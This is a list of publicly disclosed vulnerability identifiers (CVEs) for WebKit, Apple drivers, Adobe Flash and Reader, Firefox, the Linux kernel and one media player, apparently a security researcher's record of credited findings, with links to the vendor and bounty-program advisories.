Apple Webkit ContentEditable moveParagraphs Uninitialized Element Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-097/

CVE-2010-1399
Apple Webkit SelectionController via Marquee Event Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-094/

CVE-2010-1400
MULTIPLE VENDOR WEBKIT HTML CAPTION USE AFTER FREE VULNERABILITY
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=870

CVE-2010-1401
Apple Webkit First-Letter Pseudo-Element Style Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-098/

CVE-2010-1402
Apple Webkit ConditionEventListener Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-100/

CVE-2010-1403
Apple Webkit ProcessInstruction Target Error Message Insertion Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-099/

CVE-2010-1404
Apple Webkit Recursive Use Element Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-096/

CVE-2010-1665
Apple Webkit WebCore::FontFallbackList::determinePitch memory corruption
https://code.google.com/p/chromium/issues/detail?id=42294

CVE-2010-1749
Apple Webkit SVG RadialGradiant Run-in Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-101/

CVE-2010-1770
Apple Webkit CSS Charset Text Transformation Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-093/

CVE-2010-1786
Apple Webkit SVG ForeignObject Rendering Layout Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-141/

CVE-2010-1785
Apple Webkit SVG First-Letter Style Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-142/

CVE-2010-1784
Apple Webkit Rendering Counter Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-144/

CVE-2010-1787
Apple Webkit SVG Floating Text Element Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-153/

CVE-2010-3113
WebKit Security issue in SVGUseElement::buildShadowTree
http://www.securityfocus.com/bid/44199

CVE-2010-3114
WebKit Memory corruption with invalid text node cast for edit commands
https://code.google.com/p/chromium/issues/detail?id=49628

CVE-2010-1806
Apple Safari Webkit Runin Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-170/

CVE-2010-1822
Webkit Bad cast with svg:g element
https://code.google.com/p/chromium/issues/detail?id=55114

CVE-2010-1824
Apple Webkit Error Message Mutation Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-095/

CVE-2010-4198
Webkit Memory corruption in accessing floatptr of a textarea
https://code.google.com/p/chromium/issues/detail?id=55257

CVE-2010-3808
WebKit invalid cast issue exists in editing commands
http://support.apple.com/kb/HT4455

CVE-2010-3824
WebKit’s handling of “use” elements in SVG documents
http://support.apple.com/kb/HT4455

CVE-2011-1118
WebKit Security: WebCore::HTMLTextAreaElement::updateValue
https://code.google.com/p/chromium/issues/detail?id=71388

CVE-2011-1117
WebKit Stale nodes in Document::recalcStyleSelector
https://code.google.com/p/chromium/issues/detail?id=71386

CVE-2011-1448
WebKit stale entries in gPercentHeightDescendantsMap
https://code.google.com/p/chromium/issues/detail?id=77130

CVE-2010-1823
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-0233
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-0234
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-0237
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-0240
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-1117
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-1449
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-1453
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-1462
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-1797
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-3438
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT4808

CVE-2011-2825
Webkit fontface Invalid Font Family Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-054/

CVE-2011-2855
MULTIPLE VENDOR WEBKIT SVG ELEMENT USE AFTER FREE VULNERABILITY
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=971

CVE-2011-3928
Webkit.org Webkit copyNonAttributeProperties Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-055/

CVE-2011-3035
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT5400

CVE-2012-0634
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT5191

CVE-2012-3683
APPLE SAFARI RENDERBOX INLINEBOX TYPE CONFUSION VULNERABILITY
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=998

CVE-2013-0961
WebKit Heap Corruption Vulnerability
http://support.apple.com/kb/HT5671

CVE-2012-1521
WebKit Heap-use-after-free in WebCore::RenderObjectChildList::destroyLeftoverChildren
http://googlechromereleases.blogspot.com/2011/04/chrome-stable-update.html

CVE-2014-1368
Multiple memory corruption issues existed in WebKit
https://support.apple.com/en-us/HT203007

CVE-2016-1824
IOHIDFamily memory corruption
https://support.apple.com/zh-cn/HT206567

CVE-2016-1860
Intel Graphics Driver memory corruption
https://support.apple.com/en-us/HT206567

CVE-2016-1716
AppleGraphicsPowerManagement memory corruption
https://support.apple.com/zh-cn/HT205731

CVE-2015-5768
AppleGraphicsControl memory corruption
https://support.apple.com/en-us/HT205031

CVE-2015-3676
AppleGraphicsControl memory corruption
https://support.apple.com/en-us/HT204942

CVE-2015-3702
Intel Graphics Driver memory corruption
https://support.apple.com/en-us/HT204942

CVE-2015-3705
IOAcceleratorFamily memory corruption
https://support.apple.com/en-us/HT204942

CVE-2015-3706
IOAcceleratorFamily memory corruption
https://support.apple.com/en-us/HT204942

Adobe

CVE-2007-0071 (Pwnie 2008 nomination)
Integer overflow in Adobe Flash Player 9.0.115.0 and earlier
http://www.securityfocus.com/bid/28695

CVE-2015-6678 (Pwn2Own 2015 Flash)
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-23.html

CVE-2015-5108 (Pwn2Own 2015 Adobe Reader)
Security Updates Available for Adobe Acrobat and Reader
https://helpx.adobe.com/security/products/acrobat/apsb15-15.html

CVE-2014-0510 (Pwn2Own 2014 Flash)
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb14-14.html

CVE-2011-2135
ADOBE FLASH PLAYER ACTIONSCRIPT DISPLAY MEMORY CORRUPTION VULNERABILITY
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=935

CVE-2012-2034
ADOBE FLASH PLAYER ACTIONSCRIPT DISPLAYOBJECT LAYOUT MEMORY CORRUPTION VULNERABILITY
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=987

CVE-2015-5087
Security Updates Available for Adobe Acrobat and Reader
https://helpx.adobe.com/security/products/acrobat/apsb15-15.html

CVE-2015-3124
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-16.html

CVE-2015-3083
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-09.html

CVE-2015-3082
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-09.html

CVE-2015-3081
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-09.html

CVE-2015-0351
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-06.html

CVE-2015-3040
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-06.html

CVE-2015-3041
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-06.html

CVE-2015-0342
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-05.html

CVE-2015-0322
Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb15-04.html

Mozilla

CVE-2008-5021
Crash and remote code execution in nsFrameManager
http://www.mozilla.org/security/announce/2008/mfsa2008-55.html

CVE-2010-0183
Firefox Use-after-free error in nsCycleCollector::MarkRoots()
http://www.mozilla.org/security/announce/2010/mfsa2010-27.html

CVE-2010-3166
Firefox Heap buffer overflow in nsTextFrameUtils::TransformText
http://www.mozilla.org/security/announce/2010/mfsa2010-53.html

CVE-2010-3772
Firefox Crash and remote code execution using HTML tags inside a XUL tree
http://www.mozilla.org/security/announce/2010/mfsa2010-77.html

CVE-2012-0472
Firefox Potential memory corruption during font rendering using cairo-dwrite
http://www.mozilla.org/security/announce/2012/mfsa2012-25.html

Linux

CVE-2015-3636 (PingPong Root / Pwnie 2015 nomination)
Use-after-free flaw in the Linux kernel’s ipv4 ping support.
http://www.ubuntu.com/usn/usn-2631-1/

CVE-2016-4794
Linux Kernel bpf related UAF
http://seclists.org/oss-sec/2016/q2/332

CVE-2015-7292
Amazon Fire Phone kernel stack based buffer overflow
http://marcograss.github.io/security/android/cve/2016/01/15/cve-2015-7292-amazon-kernel-stack-buffer-overflow.html

Misc

CVE-2006-7222
Media Player Classic FLI File Processing Buffer Overflow
http://www.securityfocus.com/bid/25437